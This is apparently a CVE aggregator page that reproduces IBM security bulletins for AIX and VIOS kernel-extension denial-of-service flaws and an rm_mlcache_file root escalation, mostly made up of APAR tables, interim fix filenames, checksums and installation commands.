IBM Security Verify Governance, Identity Manager 10.01 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 224915.

CVE-2022-22449: IBM Security Verify Governance, Identity Manager information disclosure CVE-2022-22449 Vulnerability Report

IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1could allow a non-privileged local user to exploit a vulnerability in the AIX pfcdd kernel extension to cause a denial of service. IBM X-Force ID: 239170.

CVE-2022-43849: IBM AIX denial of service CVE-2022-43849 Vulnerability Report

IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX perfstat kernel extension to cause a denial of service. IBM X-Force ID: 239169.

**Remediation/Fixes**

**A. APARS**

IBM has assigned the following APARs to this problem:

For the kernel:

AIX Level

APAR

SP

7.1.5

IJ43967

SP11

7.2.5

IJ43869

SP06

7.3.0

IJ43875

SP03

7.3.1

IJ44594

SP02

VIOS Level

APAR

SP

3.1.2

IJ43995

3.1.2.50

3.1.3

IJ43869

3.1.3.30

3.1.4

IJ43869

3.1.4.20

For the CAA kernel extension:

AIX Level

APAR

SP

7.1.5

IJ43099

SP11

7.2.5

IJ41975

SP06

7.3.0

IJ42938

SP03

VIOS Level

APAR

SP

3.1.2

IJ44115

3.1.2.50

3.1.3

IJ41975

3.1.3.30

For the NFS kernel extension:

AIX Level

APAR

SP

7.1.5

IJ43072

SP11

7.2.5

IJ42159

SP06

7.3.0

IJ43468

SP03

VIOS Level

APAR

SP

3.1.2

IJ43674

3.1.2.50

3.1.3

IJ43314

3.1.3.30

For the TCP/IP kernel extension:

AIX Level

APAR

SP

7.1.5

IJ43098

SP11

7.2.5

IJ41974

SP06

7.3.0

IJ42937

SP03

VIOS Level

APAR

SP

3.1.2

IJ43598

3.1.2.50

3.1.3

IJ43217

3.1.3.30

For the perfstat kernel extension:

AIX Level

APAR

SP

7.1.5

IJ43970

SP11

7.2.5

IJ43876

SP06

7.3.0

IJ43891

SP03

7.3.1

IJ44595

SP02

VIOS Level

APAR

SP

3.1.2

IJ44114

3.1.2.50

3.1.3

IJ43876

3.1.3.30

3.1.4

IJ43876

3.1.4.20

For the pfcdd kernel extension:

AIX Level

APAR

SP

7.1.5

IJ43980

SP11

7.2.5

IJ43877

SP06

7.3.0

IJ43893

SP03

VIOS Level

APAR

SP

3.1.2

IJ44116

3.1.2.50

3.1.3

IJ43877

3.1.3.30

Subscribe to the APARs here:

https://www.ibm.com/support/pages/apar/\[APAR Number\]

By subscribing, you will receive periodic email alerting you to the status of the APAR, and a link to download the fix once it becomes available.

**B. FIXES**

IBM strongly recommends addressing the vulnerability now.

AIX and VIOS fixes are available.

An LPAR system reboot is required to complete the iFix installation, or Live Update may be used on AIX 7.2 and 7.3 to avoid a reboot.

The AIX and VIOS fixes can be downloaded via ftp or http from:

ftp://aix.software.ibm.com/aix/efixes/security/kernel\_fix5.tar

http://aix.software.ibm.com/aix/efixes/security/kernel\_fix5.tar

https://aix.software.ibm.com/aix/efixes/security/kernel\_fix5.tar

The link above is to a tar file containing this signed advisory, fix packages, and OpenSSL signatures for each package. The fixes below include prerequisite checking. This will enforce the correct mapping between the fixes and AIX Technology Levels.

For the kernel:

AIX Level

Interim Fix

7.1.5.8

IJ43967m8a.221110.epkg.Z

7.1.5.9

IJ43967m9a.221102.epkg.Z

7.1.5.9

IJ43967m9b.221111.epkg.Z

7.1.5.10

IJ43967mAa.221024.epkg.Z

7.2.5.3

IJ43869m3a.221025.epkg.Z

7.2.5.3

IJ43869m3b.221212.epkg.Z

7.2.5.4

IJ43869m4a.221017.epkg.Z

7.2.5.5

IJ43869s5a.221212.epkg.Z

7.3.0.1

IJ43875m1a.221025.epkg.Z

7.3.0.2

IJ43875m2a.221017.epkg.Z

7.3.1.1

IJ44594s1a.221212.epkg.Z

Please note that the above table refers to AIX TL/SP level as opposed to fileset level, i.e., 7.2.5.4 is AIX 7200-05-04.

NOTE: Multiple iFixes are provided for AIX 7100-05-09 and 7200-05-03.

IJ43967m9a is for AIX 7100-05-09 with bos.mp64 fileset level 7.1.5.45.

IJ43967m9b is for AIX 7100-05-09 with bos.mp64 fileset level 7.1.5.44.

IJ43869m3a is for AIX 7200-05-03 with bos.mp64 fileset level 7.2.5.103.

IJ43869m3b is for AIX 7200-05-03 with bos.mp64 fileset level 7.2.5.101.

Please reference the Affected Products and Version section above for help with checking installed fileset levels.

VIOS Level

Interim Fix

3.1.2.21

IJ43995m2b.221027.epkg.Z

3.1.2.30

IJ43995m2c.221212.epkg.Z

3.1.2.40

IJ43995m2a.221025.epkg.Z

3.1.3.10

IJ43869m3b.221212.epkg.Z

3.1.3.14

IJ43869m3a.221025.epkg.Z

3.1.3.21

IJ43869m4a.221017.epkg.Z

3.1.4.10

IJ43869s5a.221212.epkg.Z

For the CAA kernel extension:

AIX Level

Interim Fix

7.1.5.8

IJ43099m8a.221110.epkg.Z

7.1.5.9

IJ43099m9a.221102.epkg.Z

7.1.5.9

IJ43099m9b.221213.epkg.Z

7.1.5.10

IJ43099sAa.221024.epkg.Z

7.2.5.3

IJ41975m3a.221027.epkg.Z

7.2.5.3

IJ41975m3b.221212.epkg.Z

7.2.5.4

IJ41975s4a.221017.epkg.Z

7.3.0.1

IJ42938m1a.221027.epkg.Z

7.3.0.2

IJ42938s2a.221018.epkg.Z

Please note that the above table refers to AIX TL/SP level as opposed to fileset level, i.e., 7.2.5.4 is AIX 7200-05-04.

NOTE: Multiple iFixes are provided for AIX 7100-05-09 and 7200-05-03.

IJ43099m9a is for AIX 7100-05-09 with bos.cluster.rte fileset level 7.1.5.38.

IJ43099m9b is for AIX 7100-05-09 with bos.cluster.rte fileset level 7.1.5.37.

IJ41975m3a is for AIX 7200-05-03 with bos.cluster.rte fileset level 7.2.5.101.

IJ41975m3b is for AIX 7200-05-03 with bos.cluster.rte fileset level 7.2.5.100.

VIOS Level

Interim Fix

3.1.2.21

IJ44115m2a.221102.epkg.Z

3.1.2.30

IJ44115m2a.221102.epkg.Z

3.1.2.40

IJ44115m2b.221213.epkg.Z

3.1.3.10

IJ41975m3b.221212.epkg.Z

3.1.3.14

IJ41975m3a.221027.epkg.Z

3.1.3.21

IJ41975s4a.221017.epkg.Z

For the NFS kernel extension:

AIX Level

Interim Fix

7.1.5.8

IJ43072s8a.221110.epkg.Z

7.1.5.9

IJ43072sAa.221024.epkg.Z

7.1.5.10

IJ43072sAa.221024.epkg.Z

7.2.5.3

IJ42159s3a.221025.epkg.Z

7.2.5.3

IJ42159s3b.221213.epkg.Z

7.2.5.4

IJ42159s4a.221017.epkg.Z

7.3.0.1

IJ43468s1a.221025.epkg.Z

7.3.0.2

IJ43468s2a.221017.epkg.Z

Please note that the above table refers to AIX TL/SP level as opposed to fileset level, i.e., 7.2.5.4 is AIX 7200-05-04.

NOTE: Multiple iFixes are provided for AIX 7200-05-03.

IJ42159s3a is for AIX 7200-05-03 with bos.adt.include fileset level 7.2.5.102.

IJ42159s3b is for AIX 7200-05-03 with bos.adt.include fileset level 7.2.5.101.

VIOS Level

Interim Fix

3.1.2.21

IJ43674s2b.221027.epkg.Z

3.1.2.30

IJ43674s2c.221213.epkg.Z

3.1.2.40

IJ43674s2c.221213.epkg.Z

3.1.3.10

IJ42159s3b.221213.epkg.Z

3.1.3.14

IJ42159s3a.221025.epkg.Z

3.1.3.21

IJ42159s4a.221017.epkg.Z

For the TCP/IP kernel extension:

AIX Level

Interim Fix

7.1.5.8

IJ43098s8a.221110.epkg.Z

7.1.5.9

IJ43098s9a.221102.epkg.Z

7.1.5.9

IJ43098s9b.221213.epkg.Z

7.1.5.10

IJ43098sAa.221024.epkg.Z

7.2.5.3

IJ41974s3a.221025.epkg.Z

7.2.5.3

IJ41974s3b.221213.epkg.Z

7.2.5.4

IJ41974s4a.221017.epkg.Z

7.3.0.1

IJ42937s1a.221027.epkg.Z

7.3.0.2

IJ42937s2a.221018.epkg.Z

Please note that the above table refers to AIX TL/SP level as opposed to fileset level, i.e., 7.2.5.4 is AIX 7200-05-04.

NOTE: Multiple iFixes are provided for AIX 7100-05-09 and 7200-05-03.

IJ43098s9a is for AIX 7100-05-09 with bos.net.tcp.client fileset level 7.1.5.40.

IJ43098s9b is for AIX 7100-05-09 with bos.net.tcp.client fileset level 7.1.5.39.

IJ41974s3a is for AIX 7200-05-03 with bos.net.tcp.client\_core fileset level 7.2.5.102.

IJ41974s3b is for AIX 7200-05-03 with bos.net.tcp.client\_core fileset level 7.2.5.101.

VIOS Level

Interim Fix

3.1.2.21

IJ43598s2b.221027.epkg.Z

3.1.2.30

IJ43598s2d.221213.epkg.Z

3.1.2.40

IJ43598s2c.221213.epkg.Z

3.1.3.10

IJ41974s3b.221213.epkg.Z

3.1.3.14

IJ41974s3a.221025.epkg.Z

3.1.3.21

IJ41974s4a.221017.epkg.Z

For the perfstat kernel extension:

AIX Level

Interim Fix

7.1.5.8

IJ43970sAa.221024.epkg.Z

7.1.5.9

IJ43970sAa.221024.epkg.Z

7.1.5.10

IJ43970sAa.221024.epkg.Z

7.2.5.3

IJ43876s3a.221025.epkg.Z

7.2.5.3

IJ43876s3b.221213.epkg.Z

7.2.5.4

IJ43876s4a.221017.epkg.Z

7.2.5.5

IJ43876s5a.221212.epkg.Z

7.3.0.1

IJ43891s2a.221018.epkg.Z

7.3.0.2

IJ43891s2a.221018.epkg.Z

7.3.1.1

IJ44595s1a.221212.epkg.Z

Please note that the above table refers to AIX TL/SP level as opposed to fileset level, i.e., 7.2.5.4 is AIX 7200-05-04.

NOTE: Multiple iFixes are provided for AIX 7200-05-03.

IJ43876s3a is for AIX 7200-05-03 with bos.perf.perfstat fileset level 7.2.5.101.

IJ43876s3b is for AIX 7200-05-03 with bos.perf.perfstat fileset level 7.2.5.100.

VIOS Level

Interim Fix

3.1.2.21

IJ44114s2a.221102.epkg.Z

3.1.2.30

IJ44114s2a.221102.epkg.Z

3.1.2.40

IJ44114s2a.221102.epkg.Z

3.1.3.10

IJ43876s3b.221213.epkg.Z

3.1.3.14

IJ43876s3a.221025.epkg.Z

3.1.3.21

IJ43876s4a.221017.epkg.Z

3.1.4.10

IJ43876s5a.221212.epkg.Z

For the pfcdd kernel extension:

AIX Level

Interim Fix

7.1.5.8

IJ43980sAa.221024.epkg.Z

7.1.5.9

IJ43980sAa.221024.epkg.Z

7.1.5.10

IJ43980sAa.221024.epkg.Z

7.2.5.3

IJ43877s3a.221025.epkg.Z

7.2.5.4

IJ43877s4a.221017.epkg.Z

7.3.0.1

IJ43893s1a.221027.epkg.Z

7.3.0.2

IJ43893s2a.221018.epkg.Z

Please note that the above table refers to AIX TL/SP level as opposed to fileset level, i.e., 7.2.5.4 is AIX 7200-05-04.

VIOS Level

Interim Fix

3.1.2.21

IJ44116s2a.221102.epkg.Z

3.1.2.30

IJ44116s2a.221102.epkg.Z

3.1.2.40

IJ44116s2a.221102.epkg.Z

3.1.3.10

IJ43877s3a.221025.epkg.Z

3.1.3.14

IJ43877s3a.221025.epkg.Z

3.1.3.21

IJ43877s4a.221017.epkg.Z

The fixes are cumulative and address previously issued AIX/VIOS kernel security bulletins with respect to SP and TL, which includes:

https://aix.software.ibm.com/aix/efixes/security/kernel\_advisory4.asc

https://www.ibm.com/support/pages/node/6619721

https://aix.software.ibm.com/aix/efixes/security/kernel\_advisory3.asc

https://www.ibm.com/support/pages/node/6558948

https://aix.software.ibm.com/aix/efixes/security/kernel\_advisory2.asc

https://www.ibm.com/support/pages/node/6483875

https://aix.software.ibm.com/aix/efixes/security/trace\_advisory.asc

https://www.ibm.com/support/pages/node/6464369

To extract the fixes from the tar file:

tar xvf kernel\_fix5.tar

cd kernel\_fix5

Verify you have retrieved the fixes intact:

The checksums below were generated using the

"openssl dgst -sha256 \[filename\]" command as the following:

openssl dgst -sha256

filename

5f14f1ce6115aaea99abc509e8f9c29d66f449e28cbdff957a78f98a0d2c1319

IJ41974s3a.221025.epkg.Z

f461d5ac0225674d0b5fd2ce0ea1314c413f73d941e3cab1df2a8e907e479c81

IJ41974s3b.221213.epkg.Z

7353aec35438c207ecd34e9efd8773f8d2cf623ff3aaf1c9b21a8c6cc6389ba3

IJ41974s4a.221017.epkg.Z

ac6aac0b2364a1dccf99133869bcf5962a30d14c44abd72985d58b070b3e7743

IJ41975m3a.221027.epkg.Z

9320a9ecad0ed683f838f484a512de20f88d281940b63e13f334dbac0e023dd1

IJ41975m3b.221212.epkg.Z

53ed081ce54eaf4a278761c7b80b72e28643d3f07a8ab54b2977652b1cfa9410

IJ41975s4a.221017.epkg.Z

dd932b380464cc89938b42bf845d08d1aee3ab6a50ca7bc57292ddda34b849be

IJ42159s3a.221025.epkg.Z

0ad3ac0184e19719156e0b1c4af6f97501a64bb3a26543ddbda27cc975c8ad76

IJ42159s3b.221213.epkg.Z

ce81ba4ce3db613bb6635ff1496c4b65a0a09c24f8f6d0dd96606bc48b420cf5

IJ42159s4a.221017.epkg.Z

4b3d56260e136ad0b4484db0d2b4dd3924a97c5bc839f80d7ea4c21c42eb3840

IJ42937s1a.221027.epkg.Z

7081ec434fa5ff2c976f935aa6b51f4f51f6641dfd6132640c73dbaea7a6c1cf

IJ42937s2a.221018.epkg.Z

6f6d8cf2b6a52f409fa29dc72ef2ada536ea67dc907769c384f88fa60a39b622

IJ42938m1a.221027.epkg.Z

581acd69242d1f86779590e5ed0734de72b6f2452a6b499dceaa8c2b4eadad7d

IJ42938s2a.221018.epkg.Z

7d5e82ac6027d9fb1b4546a1de78220af56e77b87d2b7cb744d544aa64b20c62

IJ43072s8a.221110.epkg.Z

dc281b603fe5b7d7aa79e061a60e01f7a39eaa30233b545ee760798208ac6adf

IJ43072sAa.221024.epkg.Z

c6701b36ff490220433aa81466f5a60e182ba2559e07df7fdbd986329e187e1a

IJ43098s8a.221110.epkg.Z

1aeded2670910f1aeb2c07cef08d2d6afce788e8de58794db1e93567b5dbed77

IJ43098s9a.221102.epkg.Z

3ac4dd5bc1f3688a2b73e0da29c64cbafff025e7c1a05b5008752d3c8d8b5835

IJ43098s9b.221213.epkg.Z

470310e914d030445412685cd06897804a547b6f26f5b12499c9c3012906083f

IJ43098sAa.221024.epkg.Z

dad650e7a3f3ac27cc4ca0c3df9bbb1b0dc60ca449f0127398f7c2686c4fb67f

IJ43099m8a.221110.epkg.Z

a5eef69f5ad7999aac0090c6f44f2b830ed5fe704a03650c78834300433fefd6

IJ43099m9a.221102.epkg.Z

0690a7f9c117bb685540bda389f4f4a99020a45927a5481e72256f1912b2b5a0

IJ43099m9b.221213.epkg.Z

643694ee61b99af1d32f3723c056480c752d70d2f4c824f2e02cacf1489966f4

IJ43099sAa.221024.epkg.Z

7e4791c2b339034a6e20fb2d14968a2570795e0c292a4693e79b609d7f947a49

IJ43468s1a.221025.epkg.Z

87ea6d1ce409ae51ad7e10007bf52d0531e58d921553ada09b7da4d24fbdc6ef

IJ43468s2a.221017.epkg.Z

36fb6866347a3b4499d752edfdcade8fedd683d0514bb45b356fb69b0e77243a

IJ43598s2b.221027.epkg.Z

49d5cbd9ba461b2477eade7ee16964437fc85b32ea285f747e9286f7d3c32d35

IJ43598s2c.221213.epkg.Z

fba350df9177bab36d6f869a7debc8b5d29c8a6b3a3a7216a1dd3ac50d0179b9

IJ43598s2d.221213.epkg.Z

c423961037b20a89416d095b0385fcdbc69c9fb51b005c342945d14e5aab9294

IJ43674s2b.221027.epkg.Z

e61c7a4e495cf2da86d239f84c275f52fac696880142c603477f038cdfc55df5

IJ43674s2c.221213.epkg.Z

158e99123e6a6eb8909943a3438c032ba3f06248e6da4c6402e9efd3ce3900aa

IJ43869m3a.221025.epkg.Z

7bc058cb39721fea6c11e79a45e5e2cf8501ea762169dba214be9849ddb727d8

IJ43869m3b.221212.epkg.Z

c416914cd934f8235c9c39937d70437ab1193533142412f9726dae10cc1ff6b4

IJ43869m4a.221017.epkg.Z

2cea6bd4f5e87074bb7e4999e53cc6105cbb060c0e43d65e7a00ace071fea97f

IJ43869s5a.221212.epkg.Z

e8e91cb5a7446dd7cdeafd6f22ebd007bfcb5df7151fc1cc02888ad7859a1ba4

IJ43875m1a.221025.epkg.Z

33b719eb2216776a0cafca012771db3dc1cdf7676dbb9a8d3611e24795d1d7bb

IJ43875m2a.221017.epkg.Z

cb9e693c29e1d2f33c3a304779491030fb9233a3c5a60dc116a8acef3cc349ce

IJ43876s3a.221025.epkg.Z

5f44726c3402cacf73de3e91b5b518895e1e1a0d47141855319e48dd40d81d17

IJ43876s3b.221213.epkg.Z

e7ac8b7326ea273723968938f7405c0b105ec1413cb3c4ca6db54d91e13977e3

IJ43876s4a.221017.epkg.Z

d4815878bc65ba7524718d0b75f211f7bf5e8c97ed644894843309fdc312cdaf

IJ43876s5a.221212.epkg.Z

56f4a15bd4b5c33642207323dc1d21262f7558ad7879d5fc3f8c6f5fdf020ca1

IJ43877s3a.221025.epkg.Z

466c3b4a3238e68226ff7886771ec37d0787a964b8a27dba5d01f3a51c610af4

IJ43877s4a.221017.epkg.Z

68e3dadd864733d1edd5c59228fb0d6418829689a3395396f2237f9782093110

IJ43891s2a.221018.epkg.Z

714238ea24f04de93378bf879d1ab1b1dc1592a73732bd345915b16849940c9d

IJ43893s1a.221027.epkg.Z

c3b40b12d60119453b32c1b0cd73d560c7b7755703c62bff138d986dd78c3c4c

IJ43893s2a.221018.epkg.Z

3342e50f48f0c995d4ab0ed852cbc3f782b05be4938bffddd06bdcd206fe5b13

IJ43967m8a.221110.epkg.Z

307f93cee2e4767d2cedec1c705acfbd099d7b8b32c8853bcfa18ff762a6fc1f

IJ43967m9a.221102.epkg.Z

952d2e4b8888ea3beca7fbe6841191fdd58675f3640e4018d0f9de430016c504

IJ43967m9b.221111.epkg.Z

f819756d2d2ab6094ae4744babbf9cc10d47e04484973dac44a736029e741e21

IJ43967mAa.221024.epkg.Z

e7f8b39a6df86429f9859e7e6364a37b73de53952fd8cb69a570ab6397196055

IJ43970sAa.221024.epkg.Z

51589ea00f8e6574d563e71ae33604d7b7397391482165495aa27d867926354c

IJ43980sAa.221024.epkg.Z

64a961365a68e435e35313e7bd5fda2b2f1d93c84a266e1dddfe792b3b43efdd

IJ43995m2a.221025.epkg.Z

20f41357e75da7a386de8990c92a781c32de92fbfaa6bc56eda09685dcf979ea

IJ43995m2b.221027.epkg.Z

541cee83f622844dd0c6ca50515e3d41e6a6727c7a1264ca67ca696c8c7984d1

IJ43995m2c.221212.epkg.Z

c89483dc79d4132f32bc41211696616c4707c253a4c452a2829b122d1b19db06

IJ44114s2a.221102.epkg.Z

9cb895991f8a94f66ef77985cacec5a5f7018f97dd2567f403cfb5aeb4d43f73

IJ44115m2a.221102.epkg.Z

7c5490016562d664d5d7a68ef2669407053ccb2175f8b0f13a3dd1197e1287d0

IJ44115m2b.221213.epkg.Z

82caf3050ae1ea2120e3fc6aec0e4387f51c7e8b1b28993d799dc4c7bdd066a2

IJ44116s2a.221102.epkg.Z

9b8f2f3a5a17596b2388e01fb4006a937d363f3b044b27ff817081b0d4b2c915

IJ44594s1a.221212.epkg.Z

1af43848b2d615d9a341b5b9d79a36d6ce61b3f7911808c0a07e5a14189cd33e

IJ44595s1a.221212.epkg.Z

These sums should match exactly. The OpenSSL signatures in the tar file and on this advisory can also be used to verify the integrity of the fixes. If the sums or signatures cannot be confirmed, contact IBM Support at http://ibm.com/support/ and describe the discrepancy. 

openssl dgst -sha256 -verify \[pubkey\_file\] -signature \[advisory\_file\].sig \[advisory\_file\]

openssl dgst -sha256 -verify \[pubkey\_file\] -signature \[ifix\_file\].sig \[ifix\_file\]

Published advisory OpenSSL signature file location:

http://aix.software.ibm.com/aix/efixes/security/kernel\_advisory5.asc.sig

https://aix.software.ibm.com/aix/efixes/security/kernel\_advisory5.asc.sig

ftp://aix.software.ibm.com/aix/efixes/security/kernel\_advisory5.asc.sig

**C. FIX AND INTERIM FIX INSTALLATION**

An LPAR system reboot is required to complete the iFix installation, or Live Update may be used on AIX 7.2 and 7.3 to avoid a reboot.

If possible, it is recommended that a mksysb backup of the system be created. Verify it is both bootable and readable before proceeding.

To preview a fix installation:

installp -a -d fix\_name -p all # where fix\_name is the name of the

\# fix package being previewed.

To install a fix package:

installp -a -d fix\_name -X all # where fix\_name is the name of the

\# fix package being installed.

Interim fixes have had limited functional and regression testing but not the full regression testing that takes place for Service Packs; however, IBM does fully support them.

Interim fix management documentation can be found at:

http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html

To preview an interim fix installation:

emgr -e ipkg\_name -p # where ipkg\_name is the name of the

\# interim fix package being previewed.

To install an interim fix package:

emgr -e ipkg\_name -X # where ipkg\_name is the name of the

\# interim fix package being installed.

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SWG10","label":"AIX"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"}\],"Version":"7.1,7.2,7.3","Edition":"","Line of Business":{"code":"LOB08","label":"Cognitive Systems"}},{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSPHKW","label":"PowerVM Virtual I\\/O Server"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"}\],"Version":"3.1","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}}\]

CVE-2022-43848: Security Bulletin: AIX is vulnerable to denial of service vulnerabilities

IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the rm_rlcache_file command to obtain root privileges. IBM X-Force ID: 236690.

**Security Bulletin**

  

**Summary**

A vulnerability in the AIX rm\_mlcache\_file user command could allow a non-privileged local user to obtain root privileges (CVE-2022-41290).

**Vulnerability Details**

**CVEID:**   CVE-2022-41290  
**DESCRIPTION:**   IBM AIX could allow a non-privileged local user to exploit a vulnerability in the rm\_mlcache\_file command to obtain root privileges.  
CVSS Base score: 8.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/236690 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**Affected Products and Versions**

Affected Product(s)

Version(s)

AIX

7.1

AIX

7.2

AIX

7.3

VIOS

3.1

The vulnerabilities in the following filesets are being addressed:

Fileset

Lower Level

Upper Level

bos.rte.install

7.1.5.0

7.1.5.48

bos.rte.install

7.2.5.0

7.2.5.5

bos.rte.install

7.2.5.100

7.2.5.105

bos.rte.install

7.3.0.0

7.3.0.3

To find out whether the affected filesets are installed on your systems, refer to the lslpp command found in AIX user's guide.

Example: lslpp -L | grep -i bos.rte.install

**Remediation/Fixes**

**A. APARS**

IBM has assigned the following APARs to this problem:

AIX Level

APAR

SP

7.1.5

IJ42230

SP11

7.2.5

IJ42163

SP05

7.3.0

IJ42234

SP03

VIOS Level

APAR

SP

3.1.2

IJ42232

3.1.2.50

3.1.3

IJ42163

3.1.3.30

Subscribe to the APARs here:

https://www.ibm.com/support/pages/apar/IJ42163

https://www.ibm.com/support/pages/apar/IJ42230

https://www.ibm.com/support/pages/apar/IJ42232

https://www.ibm.com/support/pages/apar/IJ42234

By subscribing, you will receive periodic email alerting you to the status of the APAR, and a link to download the fix once it becomes available.

**B. FIXES**

IBM strongly recommends addressing the vulnerability now.

The AIX and VIOS fixes can be downloaded via ftp or http from:

ftp://aix.software.ibm.com/aix/efixes/security/rmmlcache\_fix.tar

http://aix.software.ibm.com/aix/efixes/security/rmmlcache\_fix.tar

https://aix.software.ibm.com/aix/efixes/security/rmmlcache\_fix.tar

The link above is to a tar file containing this signed advisory, fix packages, and OpenSSL signatures for each package. The fixes below include prerequisite checking. This will enforce the correct mapping between the fixes and AIX Technology Levels.

AIX Level

Interim Fix

7.1.5.8

IJ42230mAa.221208.epkg.Z

7.1.5.9

IJ42230mAa.221208.epkg.Z

7.1.5.10

IJ42230mAa.221208.epkg.Z

7.2.5.3

IJ42163m4a.221213.epkg.Z

7.2.5.4

IJ42163m4a.221213.epkg.Z

7.3.0.1

IJ42234m2a.221213.epkg.Z

7.3.0.2

IJ42234m2a.221213.epkg.Z

Please note that the above table refers to AIX TL/SP level as opposed to fileset level, i.e., 7.2.5.4 is AIX 7200-05-04.

Please reference the Affected Products and Version section above for help with checking installed fileset levels.

VIOS Level

Interim Fix

3.1.2.21

IJ42232m2a.221213.epkg.Z

3.1.2.30

IJ42232m2a.221213.epkg.Z

3.1.2.40

IJ42232m2a.221213.epkg.Z

3.1.3.10

IJ42163m4a.221213.epkg.Z

3.1.3.14

IJ42163m4a.221213.epkg.Z

3.1.3.21

IJ42163m4a.221213.epkg.Z

To extract the fixes from the tar file:

tar xvf rmmlcache\_fix.tar

cd rmmlcache\_fix

Verify you have retrieved the fixes intact:

The checksums below were generated using the "openssl dgst -sha256 \[filename\]" command as the following:

openssl dgst -sha256

filename

151660fafedd0bf43da9579f272cf01fa4435ae6d58a118d9628a91f1dbdfc49

IJ42163m4a.221213.epkg.Z

09f08f7976bb940137be2cf67362481e1b9d892b8ab02e94464fdcbd4be49e00

IJ42230mAa.221208.epkg.Z

9ae3e496e4017b98ff10327ad03778c45e0402a8024c33f257754a8f2bf0aaf8

IJ42232m2a.221213.epkg.Z

8c3a1e7a9dbb76c005158184b88fffa07b16cf3f001565578f7690fb599d9a72

IJ42234m2a.221213.epkg.Z

These sums should match exactly. The OpenSSL signatures in the tar file and on this advisory can also be used to verify the integrity of the fixes. If the sums or signatures cannot be confirmed, contact IBM Support at http://ibm.com/support/ and describe the discrepancy. 

openssl dgst -sha256 -verify \[pubkey\_file\] -signature \[advisory\_file\].sig \[advisory\_file\]

openssl dgst -sha256 -verify \[pubkey\_file\] -signature \[ifix\_file\].sig \[ifix\_file\]

Published advisory OpenSSL signature file location:

http://aix.software.ibm.com/aix/efixes/security/rmmlcache\_advisory.asc.sig

https://aix.software.ibm.com/aix/efixes/security/rmmlcache\_advisory.asc.sig

ftp://aix.software.ibm.com/aix/efixes/security/rmmlcache\_advisory.asc.sig

**C. FIX AND INTERIM FIX INSTALLATION**

If possible, it is recommended that a mksysb backup of the system be created. Verify it is both bootable and readable before proceeding.

To preview a fix installation:

installp -a -d fix\_name -p all # where fix\_name is the name of the

\# fix package being previewed.

To install a fix package:

installp -a -d fix\_name -X all # where fix\_name is the name of the

\# fix package being installed.

Interim fixes have had limited functional and regression testing but not the full regression testing that takes place for Service Packs; however, IBM does fully support them.

Interim fix management documentation can be found at:

http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html

To preview an interim fix installation:

emgr -e ipkg\_name -p # where ipkg\_name is the name of the

\# interim fix package being previewed.

To install an interim fix package:

emgr -e ipkg\_name -X # where ipkg\_name is the name of the

\# interim fix package being installed.

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

14 Dec 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSPHKW","label":"PowerVM Virtual I\\/O Server"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"}\],"Version":"3.1","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}},{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SWG10","label":"AIX"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"}\],"Version":"7.1,7.2,7.3","Edition":"","Line of Business":{"code":"LOB08","label":"Cognitive Systems"}}\]

CVE-2022-41290: Security Bulletin: AIX is affected by a root privilege escalation vulnerability (CVE-2022-41290)

IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1could allow a non-privileged local user to exploit a vulnerability in CAA to cause a denial of service. IBM X-Force ID: 235183.

CVE-2022-39165: IBM AIX denial of service CVE-2022-39165 Vulnerability Report

IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX TCP/IP kernel extension to cause a denial of service. IBM X-Force ID: 235599.

CVE-2022-40233: IBM AIX denial of service CVE-2022-40233 Vulnerability Report

